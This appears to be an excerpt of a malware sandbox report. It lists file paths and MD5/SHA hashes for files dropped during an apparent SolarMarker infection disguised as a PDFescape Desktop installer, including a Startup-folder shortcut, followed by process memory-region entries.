C:\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
C:\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
C:\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
C:\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
C:\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msiMD5
692a85c10d2e69d290a14aef95aae86f
SHA1381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1
SHA25665f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d
SHA51238a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933
-
C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16aMD5
f49af433f9076c15cab2d858be35b939
SHA119fb76407184356e82560714f225a323ec19abc9
SHA256c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154
SHA51289163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
9c3924724e332a4fcd197e1ef08862db
SHA1fc1f16f45a7ae8907d4e22aed7285fed2bf63d65
SHA256138473f3540469ed0993588cc2c9c6772c90bb1b087f1e8710b26d26666873de
SHA51278675e62bbb382733633feeea104e2f4920abb1485637881cd1d7887aff5e3b006ab9221be703e8a35d31d21d9351213ce57c9a74e9ef95893e7c8f51569e1a8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
3a988bae257d280c4de52b1f0cfdcd11
SHA1e33a9b3005c5f186d96380fec6363eb8c6b1aca2
SHA256436c4b5ad41c6d6ed8284be6d68c207bdea9798d20c47547fd3ea42b1c55d851
SHA512c808ed8d35205f491c5d6ca7fd2d6ab2bb8ae218b7300a4e3638c726fd66bde7591929375d2646e88c2acc3cc4c5d5624e5566438e05be98e417568ec98d2f04
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
8156dd056c069e7884d163cfc0cafbcd
SHA15ecc13aa74626142f75248ad7bcf44ce27ed12b7
SHA256be7613120234c406aba91cbe0e955301b7561b181b61fcf71da020ed9590ea15
SHA5128fa1c69b51a126025d8841bd3c9a6352d7477cad54a6a947928a0fc11b0e84b7e9aa198f6b3d85e69d58593db7bc77a9ad5f7b26c95809b942c4894290f7f607
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
797f1aa1e2cccbd321ec0bd2ada0f61c
SHA1cad399cc371ad6a828d1ff8a26738a7c54ac759b
SHA256092c6d6d78a3f7806c9b7a25ee07257e410fd36b7e659d32926ea96773dd40a0
SHA5120c680bf5c1d70ee28e33fcc6066d83bf2997dc18e1f5925a3d2dfaa76446d60d5570f623e7e6978a5da0e7590f24bd25ade211d83c6947cb9c1a9de30d73486a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
e71a0a7e48b10bde0a9c54387762f33e
SHA1fed75947f1163b00096e24a46e67d9c21e7eeebd
SHA25683d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de
SHA512394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d574cec60e7a2c741d228106f7200e9d
SHA1f4e5d54789b13753635b273569e5416520c07f2d
SHA256088fa9def280fd2d923cb3f1fa4956b37975e5ef8019e37acfd3b3074879a758
SHA51254486c94df4932de9e2e2ccfe163e91a21b0ec876c3175461625e0365142fa8b841830ceb023863ed695efe267bdf51c9c959bc6adb32bfea4c1ba4ed389df5f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
661c4f95d8261708570b0acae10bd8d1
SHA139e88a6cbe6e777a5a3567271cfa524e5888b4e4
SHA2569fc501b77e38d7dcb0e95e4836083ac610fc499d4c5cd15be691c8c909705315
SHA512cca35a29537f9d7f5f954e76bbfa17098a349f465c3d4386ca3f7cd45b9f45e7c4f19a34c7529ba4950cacbfc0f7d559d174257bd2e8b81dab68db5e571872ce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9fa87989ec5f82cf763173fd8f1c0ccc
SHA15d03b7c43986d81e33fb19a8e597adb81732a49b
SHA25601393d58d1ca9e445c9340dabdc64323ee0decb15dd17e279c70ff844e11923f
SHA512cf29e1af67daeea63bfa29b133ca6121fdef454a75d75c04fe244fc0f8d4a41ad87d87c1c04301425befd9032211de7a128a17332efe1edafacbc424c7447049
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
a58904757f24439a0f3fc17b2e0682fc
SHA1b3f136b6fd45153fefd5997f7995cd68e6a96950
SHA25602596a9e52f908335d583a64465a5feba0dccbaf52957235df4af5bc22cf7a2f
SHA5127c5e15bacda6bfdbe375d1b1ab79481af5909f26b10f8975835fef3b4c67ac4ceec19b54a35413fbe5061522b62069240969cd685a6eabced9e41184721afc9a
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmpMD5
0dc8e93706ff1b10cd6d60ab0ec15d88
SHA19e9c66127ba35ca4ee66fb3fa8820a683d4c943e
SHA2563b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7
SHA5120dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
ec6aacf8cdc4846f674c4593b56e1e33
SHA1ee3d2c75f644c0b9b4f941875f0402a6e6a7ae5c
SHA2560e4bc7f859f8d682160955dfcb207235f18f739901efa31e425ac906dfa4586f
SHA512c17bc43d909ae893525e46560f0ecc5a435ad1cf0ed0b0f13bc7bb86cfd7003835686f885429ae3b88104b4055a7fef5faa431ec0e0137fc8afe68a87802f51b
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
b8f9f50aa7c12c48518b8d1e8aacf56f
SHA17adc92800f88ceaa3cbef0749248e0ada606c130
SHA2562ae0ba74c7833ebc12122dd079b3dc661226a6b53cde474892d375b95ec1e853
SHA51204e303d27f20333fec1e69c407d8d38d3cf33bd29ccc623e0683f4ad9ba74ab6154420a24af8adcfe40e85e98d237e7cba722caae2013b72b21e71aa7717c0bc
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
0bea821aeb5410296c1976e8e266a7fb
SHA166f5485a9d16f822b28fee98be8c71d9537b8ed3
SHA2568a033e39e822568e0c9ea1b65a5d79ebb8a2c228194478058b22f856e25f1f67
SHA512ef46fb78ea259a232c870707597f9991ea3d67f6afaca319439edcba2f42261641a951d995638ed8346ef4774750a0cf079eb05d85599f02a3af6141b231879b
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
c26e655bbdd4da13b63e49e01f8bd0d7
SHA1c9cd9f96c3d1027f9a0879e04b375b32e447398c
SHA25627cabe1fa56a15d392f9fd1a75db570f390f78d0680499610b166843c8f83ea6
SHA51247bcb36fbd7b9641537ce871b453f42e5d6176f1d25a36805761662ca41e52f5dfbe62cf5a9535beb331b94e599af7d9b27a0f311e01d1f5704c45a8df70a3d8
-
C:\Users\Admin\appdata\roaming\solarmarker.datMD5
a6dd121c4c4e93ed991c95b0f450628a
SHA1194aa71717b94c1ecdd64b6c2b6994cbb2cf9796
SHA256c99bd4d14b03f358e78de770e96d4ac2a7be0915098960ab07aa43e88939d757
SHA512c10b2cfbbea8f8f1499f053941ecc62e03876a183af1b4ea1ce6e77506e80c41f76150e3aa12f04c69e32da98dc7569d81be4053efc1dbba2bf914c5e395d5da
-
\??\Volume{266d1ca4-0000-0000-0000-500600000000}\System Volume Information\SPP\OnlineMetadataCache\{bf938e5a-d670-4151-8193-6e039d31991d}_OnDiskSnapshotPropMD5
6d3c16b555d708514a21b5c8688450f5
SHA142016db97953aac171647718bd32ad2b6786f9b3
SHA2568cac0644984ec9b7f859d36fb58b0cbfd3ce6a3fafb709463e0dfbd34e481215
SHA5124422018144118e6d9b38b3301c6d8e97414b12e1630218068f101ba725a3711e66920efbd1fea47b5899d7b9ed07db26168569b04a8225468aa9215cc14a806c
-
\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
memory/1008-125-0x0000000000000000-mapping.dmp
-
memory/1104-299-0x0000000000000000-mapping.dmp
-
memory/1752-206-0x0000000006A62000-0x0000000006A63000-memory.dmpFilesize
4KB
-
memory/1752-165-0x0000000006A60000-0x0000000006A61000-memory.dmpFilesize
4KB
-
memory/1752-150-0x0000000006A00000-0x0000000006A01000-memory.dmpFilesize
4KB
-
memory/1752-133-0x0000000000000000-mapping.dmp
-
memory/1752-228-0x0000000006A63000-0x0000000006A64000-memory.dmpFilesize
4KB
-
memory/1908-145-0x0000000000000000-mapping.dmp
-
memory/1908-240-0x0000000006E83000-0x0000000006E84000-memory.dmpFilesize
4KB
-
memory/1908-180-0x0000000006E82000-0x0000000006E83000-memory.dmpFilesize
4KB
-
memory/1908-177-0x0000000006E80000-0x0000000006E81000-memory.dmpFilesize
4KB
-
memory/2204-116-0x0000000000000000-mapping.dmp
-
memory/2204-120-0x00000000035F1000-0x00000000035F5000-memory.dmpFilesize
16KB
-
memory/2204-121-0x0000000000850000-0x0000000000851000-memory.dmpFilesize
4KB
-
memory/2632-163-0x0000000006E50000-0x0000000006E51000-memory.dmpFilesize
4KB
-
memory/2632-207-0x0000000007D20000-0x0000000007D21000-memory.dmpFilesize
4KB
-
memory/2632-134-0x0000000000000000-mapping.dmp
-
memory/2632-226-0x0000000006E53000-0x0000000006E54000-memory.dmpFilesize
4KB
-
memory/2632-212-0x0000000007DC0000-0x0000000007DC1000-memory.dmpFilesize
4KB
-
memory/2632-209-0x0000000006E52000-0x0000000006E53000-memory.dmpFilesize
4KB
-
memory/2632-205-0x0000000007C40000-0x0000000007C41000-memory.dmpFilesize
4KB
-
memory/2632-194-0x0000000007BA0000-0x0000000007BA1000-memory.dmpFilesize
4KB
-
memory/2692-175-0x00000000049F2000-0x00000000049F3000-memory.dmpFilesize
4KB
-
memory/2692-138-0x0000000000000000-mapping.dmp
-
memory/2692-170-0x00000000049F0000-0x00000000049F1000-memory.dmpFilesize
4KB
-
memory/2692-247-0x00000000049F3000-0x00000000049F4000-memory.dmpFilesize
4KB
-
memory/2916-122-0x0000000000000000-mapping.dmp
-
memory/3148-280-0x0000000000000000-mapping.dmp
-
memory/3628-218-0x0000000004CA2000-0x0000000004CA3000-memory.dmpFilesize
4KB
-
memory/3628-230-0x0000000004CA3000-0x0000000004CA4000-memory.dmpFilesize
4KB
-
memory/3628-188-0x0000000004CA0000-0x0000000004CA1000-memory.dmpFilesize
4KB
-
memory/3628-137-0x0000000000000000-mapping.dmp
-
memory/3680-114-0x0000000000400000-0x0000000000501000-memory.dmpFilesize
1.0MB
-
memory/3936-135-0x0000000000000000-mapping.dmp
-
memory/3936-156-0x0000000007340000-0x0000000007341000-memory.dmpFilesize
4KB
-
memory/3936-227-0x0000000006D03000-0x0000000006D04000-memory.dmpFilesize
4KB
-
memory/3936-183-0x0000000006D02000-0x0000000006D03000-memory.dmpFilesize
4KB
-
